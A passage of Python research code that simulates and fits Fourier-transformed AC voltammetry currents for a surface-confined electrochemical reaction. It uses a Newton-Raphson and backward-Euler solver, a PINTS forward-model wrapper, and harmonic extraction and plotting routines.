(self.deltaepislon)*math.sin(self.omega*time + self.mew)\n else:\n # taking into account changes is logic if T0 is negative \n if time > self.dimlessRevT:\n # epsilon before dc current reversal\n self.epsilon = self.epsilon_start + time + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n elif time <= self.dimlessRevT:\n # epsilon after dc current reversal\n self.epsilon = self.epsilon_reverse - time + self.dimlessRevT + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n\n self.epsilon_r = self.epsilon - self.row*self.i[int(index-1)]\n\n \n def find_dtheta_X_dt(self, index: int):\n '''\n finding dtheta_X/dt as described in ref [1]\n dtheta_X/dt = k10*((1.0 - theta_X - theta_Z)*exp((1.0 - alpha1)*(epsilon_r - epsilon0_1))\n - theta_X*exp(-alpha*(epsilon_r - epsilon0_1)))\n '''\n self.dtheta_X_dt[index] = self.kappa0_1*((1.0 - self.theta_X[index] - self.theta_Z[index])*math.exp((1.0 - self.alpha1)*(self.epsilon_r - self.epsilon0_1))\n - self.theta_X[index]*math.exp(-self.alpha1*(self.epsilon_r - self.epsilon0_1)))\n\n def find_dtheta_Z_dt(self, index: int):\n '''\n finding dtheta_Z/dt as described in ref [1]\n dtheta_Z/dt = k20*((1.0 - theta_X - theta_Z)*exp(alpha2*(epsilon_r - epsilon0_2)\n - theta_Z*exp((1.0 - alpha2)*(epsilon_r - epsilon0_2)))\n '''\n self.dtheta_Z_dt[index] = self.kappa0_2*((1.0 - self.theta_X[index] - self.theta_Z[index])*math.exp(-self.alpha2*(self.epsilon_r - self.epsilon0_2))\n - self.theta_Z[index]*math.exp((1.0 - self.alpha2)*(self.epsilon_r - self.epsilon0_2)))\n\n\n \n def current_function(self, i_n, t, i_n1, index: int):\n ''' \n solving the current function described in ref [1] rearraged to equal zero \n note the backwards euler is used for di/dT\n '''\n\n dtheta_X_dt = self.dtheta_X_dt[index]\n dtheta_Z_dt = self.dtheta_Z_dt[index]\n\n if abs(self.T0) == self.T0:\n if t < self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t >= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n else:\n # taking into account changes in logic if T0 is negative \n if t > self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t <= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n \n return(-i_n1 + (gamma0 + gamma1*self.epsilon_r + gamma2*math.pow(self.epsilon_r, 2.0 ) + gamma3*math.pow(self.epsilon_r, 3.0 ))*depsilon_rdt \n + self.zeta*(dtheta_X_dt - dtheta_Z_dt))\n\n \n def deriv_current_function(self,i_n, t, i_n1):\n ''' solving the differential WRT i current function described in ref [1] rearraged to equal zero \n note the backwards euler is used for di/dT\n '''\n \n if abs(self.T0) == self.T0:\n if t < self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t >= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n else:\n # taking into account changes in logic if T0 is negative \n if t > self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t <= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n \n d2epsilon_rdidt = -self.row/self.dimlessTimeStepSize\n\n return(-1.0 + (-gamma1*self.row - 2.0*gamma2*self.row*(self.epsilon - self.row*i_n1) - 3.0*gamma3*self.row*math.pow((self.epsilon - self.row*i_n1),2.0))*depsilon_rdt \n + (gamma0 + gamma1*self.epsilon_r + gamma2*math.pow(self.epsilon_r, 2.0 ) + gamma3*math.pow(self.epsilon_r, 3.0 ))*d2epsilon_rdidt)\n\n \n def newton_raphson(self, time, index: int):\n '''implementation of the newton-raphson method to solve for the current i at the next time step\n '''\n\n x0 = self.i[int(index-1)]\n x1 = self.i[int(index-1)]\n\n if time == 0.0 or time == -0.0:\n print('inital didT: ', self.deriv_current_function(x0, time, x1))\n\n h = self.current_function(x0, time, x1, index)/self.deriv_current_function(x0, time, x1)\n\n iterations = 0\n max_iterations = 100\n while abs(h) >= 0.00001 and iterations <= max_iterations:\n\n h = self.current_function(x0, time, x1, index)/self.deriv_current_function(x0, time, x1)\n\n # x(i+1) = x(i) - f(x) / f'(x) \n\n x1 = x1 - h\n\n self.i[index] = x1\n\n \n def backwards_euler(self, index: int):\n '''\n applies the backwards euler method to theta_X and theta_Z\n as f(i(n),theta(n+1),time(n+1))\n i(n) is used to simplify the equation (rather than i(n+1))\n However, I believe this introduces error and is responsbile for the differences\n seen between this method and the pints implementation it is compared to.\n It helps explain why it scales with increasing row (uncompensated compensated)\n as the error will be greatest on the calculation of i(n+1) later\n '''\n A = math.exp((1.0 - self.alpha1)*(self.epsilon_r - self.epsilon0_1))\n B = math.exp(-self.alpha1*(self.epsilon_r - self.epsilon0_1))\n C = math.exp(-self.alpha2*(self.epsilon_r - self.epsilon0_2))\n D = math.exp((1.0 - self.alpha2)*(self.epsilon_r - self.epsilon0_2))\n\n left = np.array([[1.0/self.dimlessTimeStepSize + self.kappa0_1*A + self.kappa0_1*B, self.kappa0_1*A],\n [self.kappa0_2*C, 1.0/self.dimlessTimeStepSize + self.kappa0_2*C + self.kappa0_2*D]])\n\n right = np.array([[self.kappa0_1*A + self.theta_X[int(index-1)]/self.dimlessTimeStepSize],\n [self.kappa0_2*C + self.theta_Z[int(index-1)]/self.dimlessTimeStepSize]])\n\n solution = np.linalg.solve(left,right)\n\n self.theta_X[index] = solution[0,0]\n self.theta_Z[index] = solution[1,0]\n\n\n def set_faradaic_parameters(self, parameters):\n\n # electro-potential of the reaction\n self.kappa0_1 = parameters[0]\n self.kappa0_2 = parameters[1]\n self.epsilon0_1 = parameters[2]\n self.epsilon0_2 = parameters[3]\n self.mew = parameters[4]\n self.zeta = parameters[5]\n\n def set_capacitance_params(self, cap_params = None):\n '''\n takes a list of capasiance parameters and sets these for the model\n :param: cap_params = [gamma0, gamma1, gamma2, gamma3, omega]\n defaults to[0.0001411712994, 0.0195931114228, 0.000639515427465, 6.94671729801e-06, 2.0*math.pi*self.freq*self.T0]\n '''\n # if cap_params == None:\n # cap_params = self.suggested_capacitance_params()\n\n non_dimensiosation_constant = self.E0*self.s/(self.T0*self.I0)\n self.gamma0 = (cap_params[0]*non_dimensiosation_constant)\n self.gamma1 = (cap_params[1]*self.E0)*non_dimensiosation_constant\n self.gamma2 = (cap_params[2]*math.pow(self.E0,2.0))*non_dimensiosation_constant\n self.gamma3 = (cap_params[3]*math.pow(self.E0,3.0))*non_dimensiosation_constant\n self.gamma4 = (cap_params[4]*non_dimensiosation_constant)\n self.gamma5 = (cap_params[5]*self.E0)*non_dimensiosation_constant\n self.gamma6 = (cap_params[6]*math.pow(self.E0,2.0))*non_dimensiosation_constant\n self.gamma7 = (cap_params[7]*math.pow(self.E0,3.0))*non_dimensiosation_constant\n self.omega = (cap_params[8])*self.T0\n\n\n def solve(self, times: float64):\n '''Steps through and solves the system\n '''\n t = times[1:]\n # non dimensioanless times\n t=t/self.T0\n # specifying initial values of the following\n self.theta_X[0] = self.theta_X_Initial\n self.theta_Z[0] = self.theta_Z_Initial\n self.i[0] = self.I_inital/self.I0\n # calculating initial differentials\n # these aren't used they are just\n # calculated for completeness\n self.find_dtheta_X_dt(0)\n self.find_dtheta_Z_dt(0)\n index = 1\n for time in t:\n self.find_epsilon(time, index)\n # calculate both theta values at next time step (time)\n self.backwards_euler(index)\n # cacluate differentials\n self.find_dtheta_X_dt(index)\n self.find_dtheta_Z_dt(index)\n # finding current at next time step\n self.newton_raphson(time, index)\n index = index + 1\n\n return self.i\n\nclass wrappedNewton(pints.ForwardModel):\n def __init__(self, times: float, inital_current: float = 6.620541e-07, freq: float = 8.95931721948, startPotential: float = -0.15, revPotential: float = -0.75,\n rateOfPotentialChange: float = -22.35e-3, deltaepislon: float = 150E-3, uncomp_resis: float = 27.160770551,\n electrode_area: float = 0.03, electode_coverage: float = 6.5e-12,initaldiscard: float = 0.025, enddiscard: float = 0.875,\n cap_params: tuple = (1.13465158675681913e-04, 1.71228672908262905e-06, -2.02632468231267758e-05, -6.41028656277626023e-05,\n 1.13465158675681913e-04, 1.71228672908262905e-06, -2.02632468231267758e-05, -6.41028656277626023e-05, -6.47083954113886932e+01)):\n\n self.inital_current = inital_current\n self.freq = freq\n self.startPotential = startPotential\n self.revPotential = revPotential\n self.rateOfPotentialChange = rateOfPotentialChange\n length = times.shape\n self.numberOfMeasurements = int(length[0])\n self.half_of_measuremnts = math.ceil(self.numberOfMeasurements/2)\n self.deltaepislon = deltaepislon\n self.uncomp_resis = uncomp_resis\n self.electrode_area = electrode_area\n self.electode_coverage = electode_coverage\n self.initaldiscard = int(initaldiscard*self.half_of_measuremnts)\n self.enddiscard = int(enddiscard*self.half_of_measuremnts)\n\n if self.numberOfMeasurements % 2.0 == 0.0:\n\n self.potentialRange = np.linspace(startPotential, revPotential, self.numberOfMeasurements )\n reversed_potentialRange = np.flip(self.potentialRange)\n fullPotentialRange = np.hstack((self.potentialRange, reversed_potentialRange[1:]))\n self.fullPotentialRange = fullPotentialRange[::2]\n\n else:\n\n self.potentialRange = np.linspace(startPotential, revPotential, self.half_of_measuremnts)\n reversed_potentialRange = np.flip(self.potentialRange)\n self.fullPotentialRange = np.hstack((self.potentialRange, reversed_potentialRange[1:]))\n\n\n # as the first time is at 0.0s we take one of the numberOfMeasurements\n # to split total time evenly and get the most accurate timeStepSize\n self.timeStepSize = times[-1]/(self.numberOfMeasurements - 1)\n\n # capactiance parameters\n self.gamma0 = cap_params[0]\n self.gamma1 = cap_params[1]\n self.gamma2 = cap_params[2]\n self.gamma3 = cap_params[3]\n self.gamma4 = cap_params[4]\n self.gamma5 = cap_params[5]\n self.gamma6 = cap_params[6]\n self.gamma7 = cap_params[7]\n self.omega = cap_params[8]\n \n def n_outputs(self):\n \"\"\" \n See :meth:`pints.ForwardModel.n_outputs()`.\n number of outputs of the model\n \"\"\"\n # current I\n return 1\n \n def n_parameters(self):\n \"\"\" See :meth:`pints.ForwardModel.n_parameters()`. \n :return: dimensions of parameter vector\n \"\"\"\n # kappa0_1, kappa0_2, epsilon0_1, epsilon0_2, mew, zeta\n # gamma0, gamma1, gamma2, gamma3, omega\n # need to change to 11 when sensitivities have been adjusted\n return 6\n \n def _simulate(self, parameters, times, FT):\n \"\"\"\n Private helper function that uses ``scipy.integrate.odeint`` to\n simulate a model (with or without sensitivities).\n \"\"\"\n \n # ensuring time and parameters are numpy array\n # times = np.asarray(times)\n parameters = np.asarray(parameters)\n\n # creating instance of newtonRaphsonFT\n\n solver = newtonRaphsonFT(timeStepSize=self.timeStepSize, inital_current=self.inital_current, freq=self.freq, startPotential=self.startPotential,\n revPotential=self.revPotential, rateOfPotentialChange=self.rateOfPotentialChange,\n numberOfMeasurements=self.numberOfMeasurements, deltaepislon=self.deltaepislon, uncomp_resis=self.uncomp_resis,\n electrode_area=self.electrode_area, electode_coverage=self.electode_coverage)\n\n # nondimensionalsing parameters\n params= []\n params.append(parameters[0]*solver.T0) #k0_1\n params.append(parameters[1]*solver.T0) #K0_2\n params.append(parameters[2]/solver.E0) #E0_1\n params.append(parameters[3]/solver.E0) # E0_2\n params.append(parameters[4]) # phase is demnsionless\n params.append(parameters[5]*(solver.F*solver.s*solver.GAMMA/(solver.T0*solver.I0))) # zeta\n params = np.asarray(params)\n\n solver.set_faradaic_parameters(params)\n capacitance = self.get_capacitance_params()\n solver.set_capacitance_params(capacitance)\n\n # solving up to potential reversal\n # nondimensionalsing time\n #dimlessTimes = times/solver.T0\n\n # solving using newtonRaphsonFT\n i = solver.solve(times)\n\n if FT == True:\n return self.FT_and_reduce_to_harmonics_4_to_12(i)\n else:\n return i\n\n\n def simulate(self, parameters, times):\n \"\"\" See :meth:`pints.ForwardModel.simulate()`. \"\"\"\n i = self._simulate(parameters, times, False)\n return i\n\n def simulate_raw_current(self, parameters, times):\n \n i = self._simulate(parameters, times, False)\n #only returns Fourier transformed observable parameters which is current\n #i = np.append(i, i[0])\n # I = np.asarray(i)\n return i\n\n def simulate_reduced_FT_current(self, parameters, times):\n \n FT = self._simulate(parameters, times, True)\n #only returns Fourier transformed observable parameters which is current\n #i = np.append(i, i[0])\n # I = np.asarray(i)\n return FT\n\n def suggested_parameter(self):\n \"\"\"Returns a list with suggestsed parameters for the model with dimensions\n kappa0_1 and kappa0_2 have dims s^(-1)\n epsilon0_1 and epsilon0_2 have dims V\n mew is in radians\n zeta is dimensionless\n return: [kappa0_1, kappa0_2, epsilon0_1, epsilon0_2, mew, zeta]\n \"\"\"\n # mew = -8.82407598543352156e-02 # by my fitting\n mew = -0.031244092599793216 # by paper\n return [3400.0, 3400.0, -0.437459534627, -0.46045114238, mew, 1.0]\n\n def get_capacitance_params(self):\n \"\"\"Returns a list with suggestsed capacitance parameters for the model with dimension\n return: [gamma0, gamma1, gamma2, gamma3, omega]\n \"\"\"\n return [self.gamma0, self.gamma1, self.gamma2, self.gamma3,\n self.gamma4, self.gamma5, self.gamma6, self.gamma7, self.omega]\n\n def get_non_dimensionality_constants(self):\n \"\"\" Helper function to obtain the non dimensionality constants from the base Python class\n\n Returns:\n list: contains the non dimenstality constants [E0, T0, I0]\n \"\"\"\n\n solver = newtonRaphsonFT(timeStepSize=self.timeStepSize, inital_current=self.inital_current, freq=self.freq, startPotential=self.startPotential,\n revPotential=self.revPotential, rateOfPotentialChange=self.rateOfPotentialChange, numberOfMeasurements=self.numberOfMeasurements,\n deltaepislon=self.deltaepislon, uncomp_resis=self.uncomp_resis, electrode_area=self.electrode_area,\n electode_coverage=self.electode_coverage)\n\n return [solver.E0, solver.T0, solver.I0]\n\n def FT_and_reduce_to_harmonics_4_to_12(self, Data):\n \"\"\"Fourier transforms given data and reduces it to harmonics 3 to 12\n\n param: Data data to Fourier transform and reduce\n return: numpy array contain fourier transformed data for harmonics 3 -12\n \"\"\"\n sp = np.fft.fft(Data)\n #sp = sp/(self.numberOfMeasurements*2) # as FFT scales by number of measurements to make inverse easy\n #sp = np.abs(sp) # combining real and imaginary parts\n #sp = 2*sp # doubling amplitudes as it is split between -ve and +ve frequencies and we are going to discard negative frequencies\n sp = sp[:self.half_of_measuremnts] #discarding -ve frequencies\n output = sp[self.initaldiscard:self.half_of_measuremnts - self.enddiscard] # reducing to harmonics 4 - 12\n output = np.asarray(output)\n return output\n\n def frequencies_for_harmonics_4_to_12(self, times):\n \"\"\"Fourier transforms given data and reduces it to harmonics 3 to 12\n\n param: Data data to Fourier transform and reduce\n return: numpy array contain fourier transformed data for harmonics 3 -12\n \"\"\"\n freq_org = np.fft.fftfreq(times.shape[0], d= self.timeStepSize)\n freq=freq_org[:self.half_of_measuremnts]\n freq = freq[self.initaldiscard:self.half_of_measuremnts - self.enddiscard] # reducing to harmonics 4 - 12\n return freq\n \n def harmonic_spacing(self, experimental_data, exp_times, adjustment: int = 0):\n \"\"\"caculates the spacing between individual harmonics of the FT current\n\n Args:\n experimental_data (numpy array , float): experimental currents \n exp_times (numpy array , float): experimental times corresponding to current measurements\n\n Returns:\n int: index of the highest magnitude peak of Fourier transformation i.e the peak of the first harmonic\n \"\"\"\n\n full_sim = np.fft.fft(experimental_data)\n half_full_sim = full_sim[:self.half_of_measuremnts]\n\n freq_org = np.fft.fftfreq(exp_times.shape[0], d= self.timeStepSize)\n freq_org=freq_org[:self.half_of_measuremnts]\n\n x = np.where(freq_org < self.freq)\n print('x[0][-1]: ', x[0][-1])\n spacing = x[0][-1]\n\n y = np.where(freq_org > self.freq)\n print('y[0][0]: ', y[0][0])\n\n z = np.where(freq_org == self.freq)\n print('z[0]: ', z[0])\n\n low = spacing - 80\n upper = spacing + 80\n\n if exp_times is not None:\n xaxislabel = \"frequency/Hz\" # \"potential/V\"\n\n plt.figure()\n plt.title(\"experimental FT\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(freq_org, np.log10(half_full_sim),'royalblue', label='experimental_data')\n plt.plot(freq_org[low:upper], np.log10(half_full_sim[low:upper]),'r', label='experimental_harmonic 1')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n plt.close('all')\n\n spacing_x = x[0][-1] +adjustment\n spacing_y = y[0][0] +adjustment\n\n plt.figure()\n plt.title(\"experimental FT harmonic 1 and mid point (max)\")\n plt.ylabel(\"amplituide\")\n plt.xlabel(xaxislabel)\n plt.plot(freq_org[low:upper], np.log10(half_full_sim[low:upper]),'r', label='experimental_harmonic 1')\n plt.plot(freq_org[spacing_x], np.log10(half_full_sim[spacing_x]),'kX', label='spacing_x')\n plt.plot(freq_org[spacing_y], np.log10(half_full_sim[spacing_y]),'yX', label='spacing_y')\n if z[0] is not None:\n spacing_z =z[0]\n plt.plot(freq_org[spacing_z], np.log10(half_full_sim[spacing_z]),'cX', label='spacing_z')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n plt.show()\n plt.close('all')\n\n # plt.figure(figsize=(18,10))\n # plt.title(\"experimental FT\")\n # plt.ylabel(\"amplituide\")\n # plt.xlabel(xaxislabel)\n # plt.plot(freq_org, np.log10(half_full_sim),'royalblue', label='experimental_data')\n # freq = self.frequencies_for_harmonics_4_to_12(times =exp_times)\n # Ft_reduced_sim = self.simulate_reduced_FT_current(parameters= [4.00000000000000000e+03, 3.99999999971199850e+03,\n # -3.42625240890104044e-01, -3.32825431395151972e-01,\n # -1.37555866965690110e-02, 4.84787412952000452e-01], times = exp_times)\n # plt.plot(freq, np.log10(Ft_reduced_sim),'r', label='experimental_harmonics 4- 12')\n # plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n # plt.show()\n\n # plt.figure(figsize=(18,10))\n # plt.title(\"experimental FT\")\n # plt.ylabel(\"amplituide\")\n # plt.xlabel(xaxislabel)\n # plt.plot(freq, np.log10(Ft_reduced_sim),'r', label='experimental_harmonics 4- 12')\n # plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n # plt.show()\n\n # change as approriate\n # was orginally -1\n return int(spacing_x)\n\n def index_distance_covering(self, Hz_interval, exp_times):\n \"\"\"number of indexs needed to span the frequency interval Hz_interal\n\n Args:\n Hz_interval (float): Hz interval desried to cut of harmonics around\n exp_times (numpy array , float): experimental times corresponding to current measurements\n\n Returns:\n float: number of frequency steps (indexs) spaning the Hz interval \n \"\"\"\n\n freq_org = np.fft.fftfreq(exp_times.shape[0], d= exp_times[1])\n\n return Hz_interval/freq_org[1]\n\n\n def ploting_harmonic(self, experimental_data, times, parameter_for_sim, print_these_harmonics = None, Hz_interval = 1.5, print_harmonics = True,\n check_FT_harmonic_locations = False, print_all_harmonics = True, print_simulated_harmonics_alone = False, save_to = None, FirstAdjustment: int = -1,\n FourthAdjustment: int = -4):\n \"\"\"ploting harmonics of data against simulated harmonics\n\n Args:\n experimental_data (numpy array): experimental data\n times (numpy array): times for simulation\n parameter_for_sim (numpy array): [kappa0_1, kappa0_2, epsilon0_1, epsilon0_2, mew, zeta]\n \"\"\"\n\n FT_reduced_exp = self.FT_and_reduce_to_harmonics_4_to_12(experimental_data)\n Ft_reduced_sim = self.simulate_reduced_FT_current(parameters= parameter_for_sim, times = times)\n\n freq = self.frequencies_for_harmonics_4_to_12(times =times)\n\n # 4th harmonic centered at 303\n # should be seprated by ~ 480 measurements\n print('*'*10+'cacluating harmonic spacing'+'*'*10)\n spacing = self.harmonic_spacing(experimental_data, times, adjustment= FirstAdjustment)\n print('Spacing between harmonics: ', spacing)\n\n # FIXME: issue finding location of 4th harmonic mid point\n print('\\n'+'*'*10+'cacluating location of 4th harmonic'+'*'*10)\n x = np.where(freq < self.freq*4)\n print('x: ', x[0][-1])\n mid_point_index = x[0][-1] + FourthAdjustment\n print('mid point index of 4th harmonic: ', mid_point_index)\n print('\\n'+'*'*10+'index distance of ' + str(Hz_interval) + 'Hz'+'*'*10)\n index_window = self.index_distance_covering(Hz_interval, times)\n print('index window covering ' + str(Hz_interval) + 'Hz: ', index_window)\n index_window = np.round(index_window)\n print('int index window covering ' + str(Hz_interval) + 'Hz: ', index_window)\n\n\n if check_FT_harmonic_locations is True:\n self._ploting_FT_haromics(mid_point_index, index_window, spacing, freq, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics)\n \n if print_harmonics is True:\n dims = freq.shape\n self._ploting_ifft_haromics(mid_point_index, index_window, spacing, dims, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics, save_to)\n\n\n\n def _ploting_ifft_haromics(self, mid_point_index, index_window, spacing, dims, Ft_reduced_sim, FT_reduced_exp,\n print_simulated_harmonics_alone, print_all_harmonics, print_these_harmonics, save_to):\n\n harmonic = 4\n low = int(mid_point_index - index_window)\n high = int(mid_point_index+ index_window + 1)\n mid = int(mid_point_index)\n\n temp = self.get_non_dimensionality_constants()\n\n I0 = temp[2]\n \n while high <= dims[0]:\n sim_plot = Ft_reduced_sim[low:high]\n # kaiser_window = np.kaiser(sim_plot.shape[0], 0)\n # array_for_iFFT = np.multiply(kaiser_window,array_for_iFFT)\n\n # plt.figure(figsize=(18,10))\n # plt.title(\"kaiser_window\")\n # plt.ylabel(\"?\")\n # plt.plot(kaiser_window,'r', linestyle='dashed', label='kaiser_window')\n # plt.tick_params(\n # axis='x', # changes apply to the x-axis\n # which='both', # both major and minor ticks are affected\n # bottom=False, # ticks along the bottom edge are off\n # top=False, # ticks along the top edge are off\n # labelbottom=False) \n # plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n # plt.show()\n\n print('sim_plot.shape: ', sim_plot.shape)\n temp = sim_plot.shape[0]*6 # 300 # int(10*harmonic) # sim_plot.shape[0]\n print('number added to each half of array: ', temp)\n mid_upper_sim_plot = Ft_reduced_sim[mid:high]\n mid_upper_sim_plot = np.hstack((mid_upper_sim_plot, np.zeros(temp)))\n lower_sim_plot = Ft_reduced_sim[low:mid]\n lower_sim_plot = np.hstack((np.zeros(temp), lower_sim_plot))\n \n array_for_iFFT = np.hstack((mid_upper_sim_plot, lower_sim_plot))\n sim_harmonic = np.fft.ifft(array_for_iFFT)\n sim_harmonic = sim_harmonic*I0\n\n sim_plot = FT_reduced_exp[low:high]\n mid_upper_sim_plot = FT_reduced_exp[mid:high]\n mid_upper_sim_plot = np.hstack((mid_upper_sim_plot, np.zeros(temp)))\n lower_sim_plot = FT_reduced_exp[low:mid]\n lower_sim_plot = np.hstack((np.zeros(temp), lower_sim_plot))\n array_for_iFFT = np.hstack((mid_upper_sim_plot, lower_sim_plot))\n exp_harmonic = np.fft.ifft(array_for_iFFT)\n exp_harmonic = exp_harmonic*I0\n\n # cacluating times and dc potential for harmonic matrices\n for_calc = sim_harmonic.shape[0]\n startT = 0.0#specify in seconds\n revT = abs((self.revPotential - self.startPotential)/(self.rateOfPotentialChange))\n endT = revT*2.0\n\n if for_calc % 2.0 == 0.0:\n for_calc = int(for_calc)\n\n first_half_times = np.linspace(startT, revT, for_calc)\n last_half_times = np.linspace(revT, endT, for_calc)\n IFFT_time = np.hstack((first_half_times, last_half_times[1:]))\n IFFT_time = IFFT_time[::2]\n\n potentialRange = np.linspace(self.startPotential, self.revPotential, for_calc)\n reversed_potentialRange = np.flip(potentialRange)\n IFFT_fullPotentialRange = np.hstack((potentialRange, reversed_potentialRange[1:]))\n IFFT_fullPotentialRange = IFFT_fullPotentialRange[::2]\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n output = np.vstack((IFFT_time, IFFT_fullPotentialRange))\n headers = ['time/s', 'potential/V']\n output = np.vstack((output, np.absolute(exp_harmonic)))\n headers.append('experimental/A')\n output = np.vstack((output, np.absolute(sim_harmonic)))\n headers.append('optimised/A')\n output = np.transpose(output)\n pd.DataFrame(output).to_csv(os.path.join(save_to, 'absolute_harmonic_'+str(harmonic)+'.txt'), header=headers, index=None, sep='\\t')\n del(output)\n\n else:\n for_calc = math.ceil(for_calc/2)\n\n first_half_times = np.linspace(startT, revT, for_calc)\n last_half_times = np.linspace(revT, endT, for_calc)\n IFFT_time = np.hstack((first_half_times, last_half_times[1:]))\n\n potentialRange = np.linspace(self.startPotential, self.revPotential, for_calc)\n reversed_potentialRange = np.flip(potentialRange)\n IFFT_fullPotentialRange = np.hstack((potentialRange, reversed_potentialRange[1:]))\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n output = np.vstack((IFFT_time, IFFT_fullPotentialRange))\n headers = ['time/s', 'potential/V']\n output = np.vstack((output, np.absolute(exp_harmonic)))\n headers.append('experimental/A')\n output = np.vstack((output, np.absolute(sim_harmonic)))\n headers.append('optimised/A')\n output = np.transpose(output)\n pd.DataFrame(output).to_csv(os.path.join(save_to, 'absolute_harmonic_'+str(harmonic)+'.txt'), header=headers, index=None, sep='\\t')\n del(output)\n\n\n\n\n if print_simulated_harmonics_alone is True:\n \n if print_all_harmonics is True or harmonic in print_these_harmonics:\n plt.figure()\n plt.title(\"Simulated Harmonic \"+ str(harmonic))\n plt.ylabel(\"Current/Dimensionless\")\n plt.plot(IFFT_time, sim_harmonic.real,'r', label='Real')\n plt.plot(IFFT_time, sim_harmonic.imag,'r', linestyle='dashed', label='Imaginary')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n plt.gca().yaxis.set_major_formatter(mtick.FuncFormatter(g))\n plt.legend(loc='best', markerscale = 0.1, labelspacing = 0.1, handlelength = 0.5, columnspacing = 0.1, borderaxespad = 0.1, handletextpad = 0.4, borderpad = 0.2)\n if save_to is not None:\n plt.savefig(os.path.join(save_to, 'Just_simulated_harmonic_' + str(harmonic)+'.png'), transparent=True, bbox_inches='tight')\n # plt.show()\n plt.close('all')\n\n if print_all_harmonics is True or harmonic in print_these_harmonics:\n\n plt.figure()\n plt.title(\"Harmonic \"+ str(harmonic))\n plt.ylabel(\"Current/Dimensionless\")\n plt.plot(IFFT_time, exp_harmonic.real,'royalblue', label='Real Exp')\n plt.plot(IFFT_time, sim_harmonic.real,'r', label='Real Best Fit')\n plt.plot(IFFT_time, exp_harmonic.imag,'royalblue', linestyle='dashed', label='Imaginary Exp')\n plt.plot(IFFT_time, sim_harmonic.imag,'r', linestyle='dashed', label='Imaginary Best Fit')\n f = mtick.ScalarFormatter(useOffset=False, useMathText=True)\n g = lambda x,pos : \"${}$\".format(f._formatSciNotation('%1.10e' % x))\n 